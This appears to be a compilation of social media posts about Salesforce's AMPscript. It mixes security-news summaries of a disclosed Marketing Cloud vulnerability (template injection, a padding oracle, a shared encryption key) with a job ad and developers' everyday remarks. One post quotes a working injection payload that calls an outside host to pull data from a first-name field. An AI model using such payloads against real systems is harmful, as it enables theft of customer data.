HackerNotes TLDR for episode 174: blog.criticalthinkingpodcast… ►⠀Salesforce Marketing Cloud got popped through Ampscript template injection plus an unauthenticated CBC bit-flipping attack. The 8 null-byte trick to leak the IV is the kind of crypto move you should keep in mind. ►⠀cPanel WHM auth bypass (CVE-2026-41940) chains a CRLF injection into a session file on disk with two different auth methods, then beats a cache to land a pre-auth session. ►⠀A single .git directory delete on Google Cloud Looker leads to RCE because git falls back to reading config from the working directory when .git is missing. Variant goldmine for any code sandbox that lets you touch the filesystem. ►⠀Skill optimizer from Tessl, prompt injection to deterministic XSS, and GPT-5.5 actually competing with Claude on black-box hacking. Lots of moving pieces this week.

『Salesforce deployed AES-GCM encryption across the platform, expired all links created prior to January 23, 2026 at 21:00 UTC, and disabled double evaluation of email subject line AMPscript.』 How we Read All Your Emails in Salesforce Marketing Cloud slcyber.io/research-center/g…

Salesforce Marketing Cloudで複数の重大脆弱性が修正された。攻撃者は企業横断で顧客メールや購読者情報を取得できる恐れがあった。 問題はSFMCのテンプレート処理と共有インフラ設計に存在していた。AMPScriptやSSJSは顧客名やメールアドレスを動的挿入する機能を持つが、「TreatAsContent」など一部機能は入力文字列をテンプレートコードとして再評価する仕様だった。さらに件名テンプレートは旧仕様で二重評価されており、購読者名に埋め込んだAMPScriptが実行可能だった。 研究者は、_Subscribersや_Sentなど内部データビューへLookupRows関数でアクセスできることを確認した。これにより配信済みメール、購読者一覧、クリック履歴、SMS追跡情報まで取得可能だった。 さらに深刻だったのは「view email in browser」機能の暗号処理である。view.example.comなど顧客専用サブドメインで利用されるqsパラメータは、旧方式で認証なしCBC暗号を採用しており、パディングオラクル攻撃が成立した。Searchlight Cyberの研究者はAMPScriptのMicrositeURL機能を悪用し、有効なqs値を偽造できた。 SFMCでは複数テナント間で静的暗号鍵を共有していたため、攻撃者は他社組織のメール内容や購読者情報まで列挙可能だった。さらに古いURL形式では単純なXOR暗号も残存しており、高速な解析も可能だった。 Salesforceは複数のCVEを割り当て、2026年1月21日から24日にかけて修正を展開した。AES-GCMへの移行、鍵ローテーション、件名二重評価の無効化に加え、2026年1月21日以前に生成された追跡リンクやCloudPagesリンクを全世界で失効させた。現時点で悪用確認はないとしている。 gbhackers.com/salesforce-mar…

ampscript is crazy. this post reminded me that shubs, @evanconnelly, and I popped a really sick ampscript data exfil of all users back in oct '24 with only 50 chars of input with this payload in a first name field: FN=%%=TreatAsContent(httpget("http://2f[.]gg/"))=%%

How we read all your emails in Salesforce Marketing Cloud. AMPScript injection in subject lines, padding oracle on a static AES key shared across every tenant. CVE-2026-22585/22586/22582/22583/2298 🔥 😏 slcyber.io/research-center/g…

🇦🇺 Hiring: Salesforce Marketing Cloud Consultant 📍Fully Remote, Australia They are seeking experienced Salesforce Marketing Cloud Consultants to join their team. Multiple positions are available, and you can choose between contract or permanent roles. Work from anywhere in Australia while supporting enterprise-level Salesforce implementations. As a Senior Marketing Cloud Consultant, you will design, build, and optimise Salesforce Marketing Cloud solutions across multiple Salesforce Clouds. You'll collaborate with stakeholders and cross-functional teams to deliver high-impact marketing automation, customer journeys, and cross-cloud integrations. Key Responsibilities: - Design & implement Salesforce Marketing Cloud solutions - Build customer journeys, segments, and automated workflows - Work with Developers, Architects & BAs on cross-cloud integrations - Provide best-practice guidance across Marketing Cloud tools - Facilitate workshops & training for client teams - Stay updated on Salesforce releases & ecosystem trends - Implement Personalisation (Interaction Studio) & Intelligence (Datorama) Key Requirements: - 3 years as a Salesforce Marketing Cloud Consultant - Strong skills in AMPscript, SQL, REST/SOAP APIs - Experience designing multi-channel marketing campaigns - Excellent stakeholder communication - Salesforce certifications highly valued - Experience with Data Cloud (CDP) or Audience Studio is a plus - Must have full Australian work rights Why Join Them? - Multiple positions available (choose contract or permanent) - Fully remote role 🌏 - Work on diverse, high-impact client projects - Exposure to advanced Salesforce multi-cloud environments - Supportive and collaborative team culture - Competitive daily rate or permanent salary package Apply Below: apply.jobadder.com/au6/2553/…

Estoy comenzando a aprender Salesforce y AMPscript 👩🏻‍💻

i will fight for my life when i have to do more than basic html and ampscript but for now, falalalalala

Use Automation Studio with Triggered Sends to automate personalized emails in real-time. Combine with AMPscript for dynamic content—saves time and boosts engagement! #MarketingChats #MomentMarketers #MarketingChampions

My work this week: - Keep on figuring out how to get liquid variables in Ampscript to work in Taxi - Build 1 complicated (all the gradients and transparency!) newsletter template - Build 10 franken-emails - Edits to birthday email

This week's work: - Write Ampscript for dynamic content so 1 template can serve 3 uses - Code new footer w/ dynamic content for whole code base - Test, edit, & build new modules in a system I coded last year - Build 2 emails utilizing existing code, while looking ways to improve

AES Encryption with AMPScript: Resolving Discrepancies crsinfosolutions.com/aes-enc…

🚀 Countdown starts! #DubaiDreamin! I’ll be speaking on "Elevating Marketing Campaigns with #AMPscript" 📈 Join me to explore how AMPscript can revolutionize marketing in Salesforce Marketing Cloud. Let’s connect if you’re attending! 🔗 #MarketingChampion #MomentMarkters

🌟 We are thrilled to announce that Tarun Gupta will join us as a speaker at Dubai Dreamin'!🌟 📢 Session Title: Elevating Marketing Campaigns with AMPscript It’s #DD24 and #DubaiDreamin24

🌟 We are thrilled to announce that @imchinmays will join us as a speaker at Dubai Dreamin' 🌟 📢 Session Title: Engagement Split using AMPscript It’s #DD24 and #DubaiDreamin24

love working in CRM because seeing the “FIRSTNAME” has made me feel like laughing and crying. what do you mean the person who built the email thought this was how ampscript worked. every single birthday email that gets sent is going to say this. tears in my eyes fr

Scripting languages, let's get some standardization of if/else syntax, shall we? elseif vs elsif vs elif is frustrating to me. #emailgeeks #scriptinglanguages #emailpeeps #hubspot #handlebars #ampscript

N learn AMPscript

He knows “Ampscript”, that’s why he cooked this offer as well lol it’s a language marketing cloud uses as well, not a lot of folks know it

I just finished my first RSS feed in an SFMC Email. Ampscript loops and iteration FTW! #emailgeeks #emailpeeps #emaildev #emaildevs #email